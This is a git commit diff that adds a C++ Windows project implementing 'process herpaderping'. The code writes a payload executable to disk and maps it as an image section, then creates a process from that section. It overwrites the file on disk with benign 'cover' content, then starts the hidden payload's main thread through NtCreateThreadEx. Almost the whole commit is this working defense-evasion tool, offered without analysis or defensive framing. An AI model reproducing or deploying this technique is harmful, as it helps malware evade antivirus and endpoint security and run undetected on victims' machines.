Updated .gitignore file

Author: spiderpig1297

.gitignore

@@ -1,3 +1,19 @@
+x64\
+Debug\
+Release\
+*.vcxproj*
+*.vs\
+*.suo
+*.db*
+*.tlog
+*.pdb
+*.idb
+*.log
+*.exe*
+*.ipch
+*.ilk
+*.opendb
+
 # Prerequisites
 *.d
 

Herpaderping/Herpaderping.sln

@@ -0,0 +1,31 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.30907.101
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Herpaderping", "Herpaderping\Herpaderping.vcxproj", "{9AD27B16-5786-4165-A461-F91532CECF48}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|x64 = Debug|x64
+		Debug|x86 = Debug|x86
+		Release|x64 = Release|x64
+		Release|x86 = Release|x86
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{9AD27B16-5786-4165-A461-F91532CECF48}.Debug|x64.ActiveCfg = Debug|x64
+		{9AD27B16-5786-4165-A461-F91532CECF48}.Debug|x64.Build.0 = Debug|x64
+		{9AD27B16-5786-4165-A461-F91532CECF48}.Debug|x86.ActiveCfg = Debug|Win32
+		{9AD27B16-5786-4165-A461-F91532CECF48}.Debug|x86.Build.0 = Debug|Win32
+		{9AD27B16-5786-4165-A461-F91532CECF48}.Release|x64.ActiveCfg = Release|x64
+		{9AD27B16-5786-4165-A461-F91532CECF48}.Release|x64.Build.0 = Release|x64
+		{9AD27B16-5786-4165-A461-F91532CECF48}.Release|x86.ActiveCfg = Release|Win32
+		{9AD27B16-5786-4165-A461-F91532CECF48}.Release|x86.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+	GlobalSection(ExtensibilityGlobals) = postSolution
+		SolutionGuid = {BA71316F-67FC-4B3A-990B-630B9EC97D74}
+	EndGlobalSection
+EndGlobal

Herpaderping/Herpaderping/Herpaderping.cpp

@@ -0,0 +1,239 @@
+#include "Herpaderping.h"
+#include <iostream>
+
+constexpr auto PROCESS_CREATE_FLAGS_INHERIT_HANDLES = 0x00000004;
+constexpr auto TARGET_PROCESS_TITLE = L"You have been hack3d!";
+constexpr auto DEFAULT_WINDOWS_STATION = L"WinSta0\\Default";
+
+Herpaderping::Herpaderping(std::string path_to_source, std::string path_to_target, std::string path_to_cover) :
+	section_handle(),
+	target_process(),
+	target_file(),
+	source_file_payload(),
+	ntdll_functions(std::make_unique<NtdllFunctions>()),
+	path_to_source(path_to_source),
+	path_to_target(path_to_target),
+	path_to_cover(path_to_cover)
+{ }
+
+void Herpaderping::run_process_with_cover()
+{
+	read_source_payload();
+
+	create_target_file_and_write_payload();
+	
+	create_target_process();
+	
+	cover_target_file();
+
+	create_and_run_target_main_thread();
+}
+
+void Herpaderping::read_source_payload()
+{
+	HANDLE source_file = CreateFileA(this->path_to_source.c_str(),
+		GENERIC_READ,
+		FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
+		nullptr,
+		OPEN_EXISTING,
+		FILE_ATTRIBUTE_NORMAL,
+		nullptr);
+	if (INVALID_HANDLE_VALUE == source_file) {
+		throw std::runtime_error("CreateFileA: failed to open source file. Error: " + error_to_str(GetLastError()));
+	}
+
+	DWORD source_file_size = GetFileSize(source_file, nullptr);
+	if (INVALID_FILE_SIZE == source_file_size) {
+		throw std::runtime_error("GetFileSize: failed to retreive source file size. Error: " + error_to_str(GetLastError()));
+	}
+
+	// TODO: check working!
+	this->source_file_payload = std::make_unique<std::vector<char>>(source_file_size);
+	if (!ReadFile(source_file, source_file_payload.get()->data(), source_file_size, nullptr, nullptr)) {
+		throw std::runtime_error("ReadFile: failed to read source file. Error: " + error_to_str(GetLastError()));
+	}
+}
+
+void Herpaderping::create_target_file_and_write_payload()
+{
+	this->target_file = CreateFileA(this->path_to_target.c_str(),
+		GENERIC_READ | GENERIC_WRITE,
+		0,
+		nullptr,
+		CREATE_ALWAYS,
+		FILE_ATTRIBUTE_NORMAL,
+		nullptr);
+	if (INVALID_HANDLE_VALUE == this->target_file) {
+		throw std::runtime_error("CreateFileA: failed to create target file. Error: " + error_to_str(GetLastError()));
+	}
+
+	DWORD a = 0;
+	if (!WriteFile(this->target_file,
+		source_file_payload.get()->data(),
+		source_file_payload.get()->size(),
+		&a,
+		nullptr)) {
+		throw std::runtime_error("WriteFile: failed to write source file to target file. Error: " + error_to_str(GetLastError()));
+	}
+}
+
+void Herpaderping::create_target_process()
+{
+	NTSTATUS create_section_return_value = (*ntdll_functions).NtCreateSection(&section_handle,
+		SECTION_ALL_ACCESS,
+		nullptr,
+		nullptr,
+		PAGE_READONLY,
+		SEC_IMAGE,
+		target_file);
+	if (create_section_return_value) {
+		throw std::runtime_error("NtCreateSection: failed to create section. Error: " + error_to_str(create_section_return_value));
+	}
+
+	ntdll_functions->NtCreateProcessEx(&target_process,
+		PROCESS_ALL_ACCESS,
+		nullptr,
+		GetCurrentProcess(),
+		PROCESS_CREATE_FLAGS_INHERIT_HANDLES,
+		section_handle,
+		nullptr,
+		nullptr,
+		FALSE);
+}
+
+void Herpaderping::cover_target_file()
+{
+	HANDLE cover_file_handle = CreateFileA(this->path_to_cover.c_str(),
+		GENERIC_READ,
+		0,
+		nullptr,
+		OPEN_EXISTING,
+		FILE_ATTRIBUTE_NORMAL,
+		nullptr);
+	if (INVALID_HANDLE_VALUE == cover_file_handle) {
+		throw std::runtime_error("CreateFileA: failed to open cover file. Error: " + error_to_str(GetLastError()));
+	}
+
+	auto cover_file_size = GetFileSize(cover_file_handle, nullptr);
+	if (INVALID_FILE_SIZE == cover_file_size) {
+		throw std::runtime_error("GetFileSize: failed to get cover file size. Error: " + error_to_str(GetLastError()));
+	}
+
+	auto cover_file_content = std::make_unique<std::vector<char>>(cover_file_size);
+	if (!ReadFile(cover_file_handle, cover_file_content.get()->data(), cover_file_size, nullptr, nullptr)) {
+		throw std::runtime_error("ReadFile: failed to read cover file. Error: " + error_to_str(GetLastError()));
+	}
+
+	if (INVALID_SET_FILE_POINTER == SetFilePointer(this->target_file, 0, nullptr, FILE_BEGIN)) {
+		throw std::runtime_error("SetFilePointer: failed to set target file pointer. Error: " + error_to_str(GetLastError()));
+	}
+
+	if (!WriteFile(this->target_file, cover_file_content.get()->data(), cover_file_size, nullptr, nullptr)) {
+		throw std::runtime_error("WriteFile: failed to overwrite target file. Error: " + error_to_str(GetLastError()));
+	}
+}
+
+void Herpaderping::create_and_run_target_main_thread()
+{
+	PRTL_USER_PROCESS_PARAMETERS process_parameters = nullptr;
+	UNICODE_STRING image_path_name;
+	UNICODE_STRING command_line;
+	UNICODE_STRING title;
+	UNICODE_STRING desktop_info;
+	PROCESS_BASIC_INFORMATION current_process_pbi;
+	PEB64 current_process_peb;
+
+	// TODO: check return value
+	ntdll_functions->NtQueryInformationProcess(GetCurrentProcess(), 
+		ProcessBasicInformation, 
+		&current_process_pbi,
+		sizeof(current_process_pbi), 
+		nullptr);
+
+	current_process_peb = *reinterpret_cast<PEB64*>(current_process_pbi.PebBaseAddress);
+
+	ntdll_functions->RtlInitUnicodeString(&image_path_name, L"C:\\Users\\idano\\Workspace\\Projects\\Herpaderping\\x64\\Debug\\target2.exe");
+	ntdll_functions->RtlInitUnicodeString(&command_line, L"\"C:\\Users\\idano\\Workspace\\Projects\\Herpaderping\\x64\\Debug\\target2.exe\"");
+	ntdll_functions->RtlInitUnicodeString(&title, L"Test");
+	ntdll_functions->RtlInitUnicodeString(&desktop_info, L"WinSta0\\Default");
+
+	ntdll_functions->RtlCreateProcessParametersEx(&process_parameters,
+		&image_path_name,
+		nullptr,
+		nullptr,
+		&command_line,
+		reinterpret_cast<PRTL_USER_PROCESS_PARAMETERS>(current_process_peb.ProcessParameters)->Environment,
+		&title,
+		&desktop_info,
+		nullptr,
+		nullptr,
+		0);
+
+	PROCESS_BASIC_INFORMATION pbi;
+	ntdll_functions->NtQueryInformationProcess(this->target_process,
+		ProcessBasicInformation, 
+		&pbi, 
+		sizeof(pbi), 
+		nullptr);
+
+	// Allocate space for the parameters in our created process.
+	auto process_allocated_space = VirtualAllocEx(this->target_process,
+		nullptr,
+		process_parameters->MaximumLength + process_parameters->EnvironmentSize,
+		MEM_COMMIT | MEM_RESERVE,
+		PAGE_READWRITE);
+	if (NULL == process_allocated_space) {
+		throw std::runtime_error("VirtualAllocEx: failed to allocate memory in target process. Error: " + error_to_str(GetLastError()));
+	}
+
+	process_parameters->Environment = reinterpret_cast<PBYTE>(process_allocated_space) + process_parameters->Length;
+
+	// Write process parameters to the process.
+	if (!WriteProcessMemory(this->target_process,
+		process_allocated_space,
+		process_parameters,
+		process_parameters->MaximumLength + process_parameters->EnvironmentSize,
+		nullptr)) {
+		throw std::runtime_error("WriteProcessMemory: failed to write parameters to target process. Error: " + error_to_str(GetLastError()));
+	}
+
+	// Update the ProcessParameters in the process PEB to point to our parameters.
+	if (!WriteProcessMemory(this->target_process,
+		reinterpret_cast<unsigned char*>(pbi.PebBaseAddress) + offsetof(PEB64, ProcessParameters),
+		&process_allocated_space,
+		sizeof(process_allocated_space),
+		nullptr)) {
+		throw std::runtime_error("WriteProcessMemory: failed to update target process's PEB. Error: " + error_to_str(GetLastError()));
+	}
+
+	const PIMAGE_DOS_HEADER payload_dos_header = reinterpret_cast<PIMAGE_DOS_HEADER>(this->source_file_payload.get()->data());
+	const PIMAGE_NT_HEADERS64 payload_nt_header = reinterpret_cast<PIMAGE_NT_HEADERS64>(this->source_file_payload.get()->data() + payload_dos_header->e_lfanew);
+
+	// Read createed process memory to find base address.
+	PEB64 process_peb;
+	if (!ReadProcessMemory(this->target_process,
+		pbi.PebBaseAddress,
+		&process_peb,
+		sizeof(process_peb),
+		nullptr)) {
+		throw std::runtime_error("ReadProcessMemory: failed to read process memory. Error: " + error_to_str(GetLastError()));
+	}
+
+	ULONGLONG entry_point = process_peb.ImageBaseAddress + payload_nt_header->OptionalHeader.AddressOfEntryPoint;
+
+	HANDLE thread_handle;
+	ntdll_functions->NtCreateThreadEx(&thread_handle,
+		THREAD_ALL_ACCESS,
+		nullptr,
+		this->target_process,
+		reinterpret_cast<PVOID>(entry_point),
+		nullptr,
+		0,
+		0,
+		0,
+		0,
+		nullptr);
+	if (NULL == thread_handle) {
+		throw std::runtime_error("NtCreateThreadEx: failed to create target process' main thread. Error: " + error_to_str(GetLastError()));
+	}
+}

Herpaderping/Herpaderping/Herpaderping.h

@@ -0,0 +1,29 @@
+#pragma once
+
+#include <vector>
+#include "NtdllFunctions.h"
+
+class Herpaderping
+{
+public:
+	Herpaderping(std::string path_to_source, std::string path_to_target, std::string path_to_cover);
+
+	void run_process_with_cover();
+
+protected:
+	void read_source_payload();
+	void create_target_file_and_write_payload();
+	void create_target_process();
+	void cover_target_file();
+	void create_and_run_target_main_thread();
+
+	HANDLE section_handle;
+	HANDLE target_process;
+	HANDLE target_file;
+	std::unique_ptr<std::vector<char>> source_file_payload;
+
+	std::unique_ptr<NtdllFunctions> ntdll_functions;
+	std::string path_to_source;
+	std::string path_to_target;
+	std::string path_to_cover;
+};

Herpaderping/Herpaderping/NtdllFunctions.cpp

@@ -0,0 +1,37 @@
+#include <string>
+#include <stdexcept>
+#include "NtdllFunctions.h"
+
+constexpr LPCSTR NTDLL_LIBRARY_NAME = "ntdll.dll";
+
+FARPROC NtdllFunctions::_get_function_address(LPCSTR function_name) const
+{
+	FARPROC func_address = GetProcAddress(this->library_handle, function_name);
+	if (!func_address) {
+		throw std::runtime_error("GetProcAddress: failed to load address for function "
+			+ std::string(function_name) +
+			". Error: " + error_to_str(GetLastError()));
+	}
+
+	return GetProcAddress(this->library_handle, function_name);
+}
+
+NtdllFunctions::NtdllFunctions()
+{
+	this->library_handle = LoadLibraryA(NTDLL_LIBRARY_NAME);
+	if (NULL == this->library_handle) {
+		throw std::runtime_error("LoadLibraryA: failed to load ntdll.dll. Error: " + error_to_str(GetLastError()));
+	}
+
+	this->NtCreateProcessEx = (NtCreateProcessExDef)_get_function_address("NtCreateProcessEx");
+	this->NtCreateThreadEx = (NtCreateThreadExDef)_get_function_address("NtCreateThreadEx");
+	this->NtCreateSection = (NtCreateSectionDef)_get_function_address("NtCreateSection");
+	this->NtQueryInformationProcess = (NtQueryInformationProcessDef)_get_function_address("NtQueryInformationProcess");
+	this->RtlInitUnicodeString = (RtlInitUnicodeStringDef)_get_function_address("RtlInitUnicodeString");
+	this->RtlCreateProcessParametersEx = (RtlCreateProcessParametersExDef)_get_function_address("RtlCreateProcessParametersEx");
+}
+
+NtdllFunctions::~NtdllFunctions()
+{
+	FreeLibrary(this->library_handle);
+}